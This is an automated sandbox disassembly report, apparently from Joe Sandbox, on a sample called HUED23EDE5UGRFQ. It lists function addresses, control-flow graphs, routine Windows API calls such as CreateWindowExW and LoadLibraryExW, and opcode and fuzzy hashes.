call 49e9644 call 49e9724 call 49e9654 call 49e9664 call 49e9734 call 49e9744 call 49e9754 call 49e9764 call 49e9684 * 8 call 49e9774 call 49e9784 call 49e9794 call 49e9644 call 49e97a4 call 49e97b4 call 49e97c4 * 4 624->634 968->562 969->562
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: $ $ $ $ $&$&$&$&$&$-$-$.$7$7$7$7$9$9$9$>$>$>$>$g$g$k$k$u$u$u$u
                        • API String ID: 0-2584884043
                        • Opcode ID: 782e79b8a4c733bc9556b70faf69e923ed6c57c0b71425121558cf8c152cb3f7
                        • Instruction ID: 6a59cc542022cbdf3a02dd75377115355f6c33a11c5bfd4d53dd4f7b756b0b10
                        • Opcode Fuzzy Hash: 782e79b8a4c733bc9556b70faf69e923ed6c57c0b71425121558cf8c152cb3f7
                        • Instruction Fuzzy Hash: 46232870910B45CFDB25EF34C844AA9B7B2FF99304F518AADD1496B360EB71AA85CF40
                        Function 049E027C Relevance: .3, Instructions: 253COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ab52b2ea9a657ff72eb48a629d0b7a93d57075420440a268a5002e6925ff5988
                        • Instruction ID: 48c69088fa8d42f500f46e458eca7f99bd2cbd618b26567dc00818a155100e5a
                        • Opcode Fuzzy Hash: ab52b2ea9a657ff72eb48a629d0b7a93d57075420440a268a5002e6925ff5988
                        • Instruction Fuzzy Hash: 9EA19F35E00319CFCB05DFA5D884EADBBBAFF89300F158665E416AB2A5DB70E941CB50
                        Function 049E29B0 Relevance: .2, Instructions: 220COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f1ab1159f39e5dbf1434cf2c59daecbe4d65710a2ef0761cb20618309f5f076
                        • Instruction ID: 8a04ee72ed859129c3317b7c186c08c32954e9bd134748955c70e2a20f868c0d
                        • Opcode Fuzzy Hash: 7f1ab1159f39e5dbf1434cf2c59daecbe4d65710a2ef0761cb20618309f5f076
                        • Instruction Fuzzy Hash: 47919235E00319CFCB05DFA1D984DEDB7BAFF99310B158655E416AB2A4EB30E982CB50
                        Function 00ACDC08 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 970 acdc08-acdc97 GetCurrentProcess 974 acdc99-acdc9f 970->974 975 acdca0-acdcd4 GetCurrentThread 970->975 974->975 976 acdcdd-acdd11 GetCurrentProcess 975->976 977 acdcd6-acdcdc 975->977 979 acdd1a-acdd32 976->979 980 acdd13-acdd19 976->980 977->976 983 acdd3b-acdd6a GetCurrentThreadId 979->983 980->979 984 acdd6c-acdd72 983->984 985 acdd73-acddd5 983->985 984->985
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 00ACDC86
                        • GetCurrentThread.KERNEL32 ref: 00ACDCC3
                        • GetCurrentProcess.KERNEL32 ref: 00ACDD00
                        • GetCurrentThreadId.KERNEL32 ref: 00ACDD59
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 8be493c7c4ffedebc12aa42f42a926c3ab4ff93c2d60ec273f7fc70086c0ea70
                        • Instruction ID: 89e812693c4abb2d202c367aa9e243cf55aa899cf8976f29b003974208a9d767
                        • Opcode Fuzzy Hash: 8be493c7c4ffedebc12aa42f42a926c3ab4ff93c2d60ec273f7fc70086c0ea70
                        • Instruction Fuzzy Hash: 8C5158B0D01209CFEB04CFA9D548B9EBBF1EF88314F25846DE419A7360D774A944CB65
                        Function 00ACBE3F Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 991 acbe3f-acbe5f 992 acbe8b-acbe8f 991->992 993 acbe61-acbe6e call acb824 991->993 995 acbe91-acbe9b 992->995 996 acbea3-acbee4 992->996 1000 acbe84 993->1000 1001 acbe70 993->1001 995->996 1002 acbee6-acbeee 996->1002 1003 acbef1-acbeff 996->1003 1000->992 1048 acbe76 call acc0e8 1001->1048 1049 acbe76 call acc0d8 1001->1049 1002->1003 1004 acbf01-acbf06 1003->1004 1005 acbf23-acbf25 1003->1005 1007 acbf08-acbf0f call acb830 1004->1007 1008 acbf11 1004->1008 1010 acbf28-acbf2f 1005->1010 1006 acbe7c-acbe7e 1006->1000 1009 acbfc0-acc080 1006->1009 1014 acbf13-acbf21 1007->1014 1008->1014 1041 acc088-acc0b3 GetModuleHandleW 1009->1041 1042 acc082-acc085 1009->1042 1011 acbf3c-acbf43 1010->1011 1012 acbf31-acbf39 1010->1012 1015 acbf45-acbf4d 1011->1015 1016 acbf50-acbf59 call acb840 1011->1016 1012->1011 1014->1010 1015->1016 1022 acbf5b-acbf63 1016->1022 1023 acbf66-acbf6b 1016->1023 1022->1023 1024 acbf6d-acbf74 1023->1024 1025 acbf89-acbf8d 1023->1025 1024->1025 1027 acbf76-acbf86 call acb850 call acb860 1024->1027 1046 acbf90 call acc3e8 1025->1046 1047 acbf90 call acc3c0 1025->1047 1027->1025 1028 acbf93-acbf96 1031 acbf98-acbfb6 1028->1031 1032 acbfb9-acbfbf 1028->1032 1031->1032 1043 acc0bc-acc0d0 1041->1043 1044 acc0b5-acc0bb 1041->1044 1042->1041 1044->1043 1046->1028 1047->1028 1048->1006 1049->1006
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ACC0A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: bfb12773058f32041711fa12c84f03700f698bf8f6642432ff10233f58953ba6
                        • Instruction ID: 82ef8765e18d8a21a239f4dac5ea578e71dfab3b3259b6313a903b2cc8cedae8
                        • Opcode Fuzzy Hash: bfb12773058f32041711fa12c84f03700f698bf8f6642432ff10233f58953ba6
                        • Instruction Fuzzy Hash: 4E813370A10B058FD724DF29D441B9ABBF5FF88300F11892EE48ADBA50D775E945CBA1
                        Function 049E26A4 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1050 49e26a4-49e26ad 1051 49e26af-49e2716 1050->1051 1052 49e2646-49e268d 1050->1052 1055 49e2718-49e271e 1051->1055 1056 49e2721-49e2728 1051->1056 1053 49e2695-49e2696 1052->1053 1054 49e2690 call 49e0228 1052->1054 1054->1053 1055->1056 1057 49e272a-49e2730 1056->1057 1058 49e2733-49e27d2 CreateWindowExW 1056->1058 1057->1058 1060 49e27db-49e2813 1058->1060 1061 49e27d4-49e27da 1058->1061 1065 49e2815-49e2818 1060->1065 1066 49e2820 1060->1066 1061->1060 1065->1066 1067 49e2821 1066->1067 1067->1067
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049E27C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: e97b79f637d324f3311121c2f986d5c51246c853182713e389920d4800c125de
                        • Instruction ID: 17e85f03a3c5a6057c12a2a3a116115b1c352b2b001dcf767e9d8cb50fd0c9a9
                        • Opcode Fuzzy Hash: e97b79f637d324f3311121c2f986d5c51246c853182713e389920d4800c125de
                        • Instruction Fuzzy Hash: 2C51D1B1C00249AFDF15CFA9C880ADDBFB5FF48310F15816AE918AB221D771A995CF51
                        Function 049E26B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1068 49e26b0-49e2716 1069 49e2718-49e271e 1068->1069 1070 49e2721-49e2728 1068->1070 1069->1070 1071 49e272a-49e2730 1070->1071 1072 49e2733-49e276b 1070->1072 1071->1072 1073 49e2773-49e27d2 CreateWindowExW 1072->1073 1074 49e27db-49e2813 1073->1074 1075 49e27d4-49e27da 1073->1075 1079 49e2815-49e2818 1074->1079 1080 49e2820 1074->1080 1075->1074 1079->1080 1081 49e2821 1080->1081 1081->1081
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 049E27C2
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 2ffb015f2082b8d4aa14e237a2eed04c36be367b67ffd8e62656838af7de864f
                        • Instruction ID: 76c3fc0f188e2de4e21578e6f22b64fb2921f60828d095bd8d3e50456b06d00f
                        • Opcode Fuzzy Hash: 2ffb015f2082b8d4aa14e237a2eed04c36be367b67ffd8e62656838af7de864f
                        • Instruction Fuzzy Hash: 4C41B2B5D00349DFDB15CF9AC884ADEBBB5BF88310F24812AE819AB210D775A845CF91
                        Function 00AC3414 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1082 ac3414-ac3415 1083 ac3445-ac34e1 CreateActCtxA 1082->1083 1084 ac3417-ac3440 1082->1084 1086 ac34ea-ac3544 1083->1086 1087 ac34e3-ac34e9 1083->1087 1084->1083 1094 ac3546-ac3549 1086->1094 1095 ac3553-ac3557 1086->1095 1087->1086 1094->1095 1096 ac3568 1095->1096 1097 ac3559-ac3565 1095->1097 1099 ac3569 1096->1099 1097->1096 1099->1099
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AC34D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 5caeca3a22d73999a17fd72ce77db48ac13c5fa3d8022f7ba9c55ff53a05dfd6
                        • Instruction ID: d7e27e0ed6b0dfe5e6649520b22d99704c41e58639c95df851d44b0c53d5ff8c
                        • Opcode Fuzzy Hash: 5caeca3a22d73999a17fd72ce77db48ac13c5fa3d8022f7ba9c55ff53a05dfd6
                        • Instruction Fuzzy Hash: 1341DEB1C00619CFDB24CFAAC944BCEBBB1BF89704F2081AAD409AB251DB755949CF51
                        Function 049E037C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1100 49e037c-49e4c8c 1103 49e4d3c-49e4d5c call 49e0254 1100->1103 1104 49e4c92-49e4c97 1100->1104 1111 49e4d5f-49e4d6c 1103->1111 1106 49e4cea-49e4d22 CallWindowProcW 1104->1106 1107 49e4c99-49e4cd0 1104->1107 1109 49e4d2b-49e4d3a 1106->1109 1110 49e4d24-49e4d2a 1106->1110 1113 49e4cd9-49e4ce8 1107->1113 1114 49e4cd2-49e4cd8 1107->1114 1109->1111 1110->1109 1113->1111 1114->1113
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 049E4D11
                        Memory Dump Source
                        • Source File: 00000000.00000002.2172442135.00000000049E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_49e0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID:
                        • API String ID: 2714655100-0
                        • Opcode ID: b6bec6c4d2d3e3dd2df241bfdb3dac97ea1d3c48f9a70a954137cd49f280be67
                        • Instruction ID: ef84a7d6b47f2c3088ee080d6a56f347b7061f2259d5408a7e15eff6c76e18c6
                        • Opcode Fuzzy Hash: b6bec6c4d2d3e3dd2df241bfdb3dac97ea1d3c48f9a70a954137cd49f280be67
                        • Instruction Fuzzy Hash: 3F412AB5A00305DFDB15CF9AC448AAABBF5FB88314F24C559D519AB321D774E841CFA0
                        Function 00AC1FB8 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1117 ac1fb8-ac34e1 CreateActCtxA 1120 ac34ea-ac3544 1117->1120 1121 ac34e3-ac34e9 1117->1121 1128 ac3546-ac3549 1120->1128 1129 ac3553-ac3557 1120->1129 1121->1120 1128->1129 1130 ac3568 1129->1130 1131 ac3559-ac3565 1129->1131 1133 ac3569 1130->1133 1131->1130 1133->1133
                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00AC34D1
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: dd471aabb278df223b95cc0360384f7c3d986cc8c9b4dc5d3507fc1da531fe1b
                        • Instruction ID: c9d720f7b85c9fcbb48b9818d466a9b473c8d4c54db20983886ee6c878e2078b
                        • Opcode Fuzzy Hash: dd471aabb278df223b95cc0360384f7c3d986cc8c9b4dc5d3507fc1da531fe1b
                        • Instruction Fuzzy Hash: 8541CEB1C0061DCFDB24CFAAC844B8EBBB5BF88704F2081AAD409AB255DB756945CF90
                        Function 00ACE258 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1134 ace258-ace2ec DuplicateHandle 1135 ace2ee-ace2f4 1134->1135 1136 ace2f5-ace312 1134->1136 1135->1136
                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ACE2DF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: c260e0deb5dba1ac3cd63d5d634a7695f4c4e7386a9bcf38b3a7a4191802cb08
                        • Instruction ID: a585cc6c210cbca640a345dbd2f1741c7ba8dca35792031a3d04bb009e280c10
                        • Opcode Fuzzy Hash: c260e0deb5dba1ac3cd63d5d634a7695f4c4e7386a9bcf38b3a7a4191802cb08
                        • Instruction Fuzzy Hash: 5C21E4B59002199FDB10CF9AD884ADEBBF8EB48310F14801AE918A3310D374A954CFA5
                        Function 00ACC2C1 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1139 acc2c1-acc308 1140 acc30a-acc30d 1139->1140 1141 acc310-acc33f LoadLibraryExW 1139->1141 1140->1141 1142 acc348-acc365 1141->1142 1143 acc341-acc347 1141->1143 1143->1142
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ACC121,00000800,00000000,00000000), ref: 00ACC332
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: e3b047dcffe5a015d4e073873f8e0505dbdea885f83da7997d15df98642d83fa
                        • Instruction ID: e76d4a9ec01463bdaad338795e1ec0c75b788fa8714b2e36798b8ad51ba6293f
                        • Opcode Fuzzy Hash: e3b047dcffe5a015d4e073873f8e0505dbdea885f83da7997d15df98642d83fa
                        • Instruction Fuzzy Hash: 281114B69002498FDB10CF9AD844ADEFBF4EB88324F15842ED519AB300C775A546CFA1
                        Function 00ACB888 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1146 acb888-acc308 1148 acc30a-acc30d 1146->1148 1149 acc310-acc33f LoadLibraryExW 1146->1149 1148->1149 1150 acc348-acc365 1149->1150 1151 acc341-acc347 1149->1151 1151->1150
                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00ACC121,00000800,00000000,00000000), ref: 00ACC332
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 66b2ae8056c3efdb7d8da322ede9cd824a7839809b560663ab0f297641821f1e
                        • Instruction ID: e14e8955012412c1571c0bff8331930fe356d71a75c17e5a80f75f3a6dde797c
                        • Opcode Fuzzy Hash: 66b2ae8056c3efdb7d8da322ede9cd824a7839809b560663ab0f297641821f1e
                        • Instruction Fuzzy Hash: A31103B68002498FDB10CF9AD444BDEFBF4EB48320F15842EE519A7200C379A945CFA5
                        Function 00ACC040 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1154 acc040-acc080 1155 acc088-acc0b3 GetModuleHandleW 1154->1155 1156 acc082-acc085 1154->1156 1157 acc0bc-acc0d0 1155->1157 1158 acc0b5-acc0bb 1155->1158 1156->1155 1158->1157
                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00ACC0A6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2166318759.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_ac0000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: ffa672b6ec0851992620e7fb06a8a335a6e2ae62f48ad24914c72cad3e124bac
                        • Instruction ID: 84e1ccd549f5a49d69b308dd98da351f0ec561088c0e61838aacb4f6984b4ba4
                        • Opcode Fuzzy Hash: ffa672b6ec0851992620e7fb06a8a335a6e2ae62f48ad24914c72cad3e124bac
                        • Instruction Fuzzy Hash: A211FDB6C00249CFDB10CF9AC444B9EFBF4AB88324F11851AD819A7210C379A945CFA1
                        Function 06A22399 Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1160 6a22399 1161 6a2239a-6a22427 1160->1161 1168 6a223b1-6a22439 1161->1168 1169 6a2243e-6a2247b 1161->1169 1177 6a223cc-6a223d0 1168->1177 1173 6a22480-6a22483 1169->1173 1173->1173 1175 6a22485-6a22957 1173->1175 1177->1161 1178 6a223d2-6a223d6 1177->1178 1179 6a22343-6a22348 1178->1179 1180 6a223dc-6a223e1 1178->1180 1179->1161 1182 6a2234a-6a2240e 1179->1182 1180->1161 1181 6a223e3-6a223e8 1180->1181 1182->1160 1182->1177
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: *
                        • API String ID: 0-163128923
                        • Opcode ID: fa2d417f8882ce9a4f11cad721b828e3a583f0859160a6ce2ba7dc694c04948e
                        • Instruction ID: 58f33c5b1c4c8cd8a55234ed5ffa9f181e5f495d6bcc67abc1dd8d52c76b5e6c
                        • Opcode Fuzzy Hash: fa2d417f8882ce9a4f11cad721b828e3a583f0859160a6ce2ba7dc694c04948e
                        • Instruction Fuzzy Hash: 80418E70E5522ADFDB54EFACD8416EEBBB1FF49340F104969D402EB290E7319A06CB91
                        Function 06A2B975 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: r
                        • API String ID: 0-1812594589
                        • Opcode ID: 54148570d7cd29a78f1f550a1e3c3ac8e81ee9b9ed98616435f6e7125ee08e62
                        • Instruction ID: 3ede00c856d6d22cb49239fae081b0dacc3defe6c62be3c18696609fedbbdcf6
                        • Opcode Fuzzy Hash: 54148570d7cd29a78f1f550a1e3c3ac8e81ee9b9ed98616435f6e7125ee08e62
                        • Instruction Fuzzy Hash: 4E413674D4522ADFDB84EFA9E084AEDBBB5FF4D305F108059E41AA7211C7359851CFA0
                        Function 06A277E0 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: 3
                        • API String ID: 0-1842515611
                        • Opcode ID: 1d00cccc4ae1b5456353f913ebf8bfea72e185bd8a80484796c25f8a28da92c9
                        • Instruction ID: efc6d41baeba7f3b088277b4e1c69f439aae7fa05381f750979e750166205fb3
                        • Opcode Fuzzy Hash: 1d00cccc4ae1b5456353f913ebf8bfea72e185bd8a80484796c25f8a28da92c9
                        • Instruction Fuzzy Hash: 09212930A48266DFE345FB5CD850A397BB5DB85214F15809BD8099F352CA32DE82C7E1
                        Function 06A213E8 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: O
                        • API String ID: 0-878818188
                        • Opcode ID: 56b87d6f8cdcb7e148d7fa1d1849db150c5da8fa8230ae6b05a1a75c93174a86
                        • Instruction ID: 0cd1d622e3f020ba02fd7fc33bf81269066db20f71b3dcac6133cd4925361fc0
                        • Opcode Fuzzy Hash: 56b87d6f8cdcb7e148d7fa1d1849db150c5da8fa8230ae6b05a1a75c93174a86
                        • Instruction Fuzzy Hash: 81218E70A00618CFD725DF69C88496BBBF6EF89304B15886DD159DB321EB30E906CB91
                        Function 06A213F8 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: O
                        • API String ID: 0-878818188
                        • Opcode ID: fd3a5e6dd450fb8e3c20027b5cccb956834c7a91638283cbfa1cacd6e1054458
                        • Instruction ID: 4193dfa939603670ce356148ba9d9f211e63aab42d574ce6cf6bfd1477335f26
                        • Opcode Fuzzy Hash: fd3a5e6dd450fb8e3c20027b5cccb956834c7a91638283cbfa1cacd6e1054458
                        • Instruction Fuzzy Hash: F9115E71A00614CFD724DF69C84496BBBFAEF89704B00886DD5599B320EB31E905CB91
                        Function 06A2D59B Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: T
                        • API String ID: 0-3187964512
                        • Opcode ID: f7f5de64090e523de4bf7d2eacde4dd8c63f698b724761383c8cbdb45147dd82
                        • Instruction ID: 5bdf3711b4aa6eafb9747aecf8d5987b6af0da88d387e3fc523bfb8e19de5d0d
                        • Opcode Fuzzy Hash: f7f5de64090e523de4bf7d2eacde4dd8c63f698b724761383c8cbdb45147dd82
                        • Instruction Fuzzy Hash: 7DF09AB098522ACFEB41EF18EC81BE8BBB9FF45304F1090A6D509B7216D770A985CF50
                        Function 06A222F1 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: *
                        • API String ID: 0-163128923
                        • Opcode ID: 5b4d99f66b2d49ba9025cd70ffdaae8ed2a0630d6791c3ada67969d01e5fa2df
                        • Instruction ID: 289026a53d60006f4b2111278e74ce9e09b9712c8f03f4432c61bb7d89b02864
                        • Opcode Fuzzy Hash: 5b4d99f66b2d49ba9025cd70ffdaae8ed2a0630d6791c3ada67969d01e5fa2df
                        • Instruction Fuzzy Hash: 79E0C270849279DFC341DB68D8841E8BB74EF02350B1900D9D80587062EA620F259781
                        Function 06A22300 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID: *
                        • API String ID: 0-163128923
                        • Opcode ID: 1adc9c2434f6e1dd016ba5a0eff0f11be07b37f42910844c2e2442ef30a27656
                        • Instruction ID: 4c81595c6be93d2086295057f65a860dd53d6a830cdb5cdad3181ecf47c5a1d4
                        • Opcode Fuzzy Hash: 1adc9c2434f6e1dd016ba5a0eff0f11be07b37f42910844c2e2442ef30a27656
                        • Instruction Fuzzy Hash: 19C08C7094810DEFD780EB8AE8096ACF7FCF702310F000094EC0A43640EBB21F1096D2
                        Function 06A224E4 Relevance: .4, Instructions: 423COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2173350091.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6a20000_HUED23EDE5UGRFQ.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 60965f0be6311fbe8366da25999f1dc00312aaa29438f238e078ed9f75ddfc18
                        • Instruction ID: 07952673e85ea1a792510b5b30bc7c90721aacbfd2dfbf6a70efe66033c2a9f4
                        • Opcode Fuzzy Hash: 60965f0be6311fbe8366da25999f1dc00312aaa29438f238e078ed9f75ddfc18
                        • Instruction Fuzzy Hash: 4C020476A40115DFDB49DF98C984E98BBB2FF48320B1A8098E509AF236C731ED51DF50
                        Function 06A21698 Relevance: .2, Instructions: 232COMMON
                        Download Yara Rule
